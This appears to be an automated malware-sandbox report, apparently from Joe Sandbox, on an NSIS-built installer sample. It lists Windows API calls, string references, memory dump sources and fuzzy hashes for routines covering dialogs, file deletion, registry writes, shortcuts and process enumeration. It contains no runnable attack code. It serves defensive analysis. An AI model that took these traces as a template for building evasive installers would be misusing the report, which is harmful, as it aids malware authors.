                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID: F$A
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Strings
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
Strings
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                        • String ID: F$N$open
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
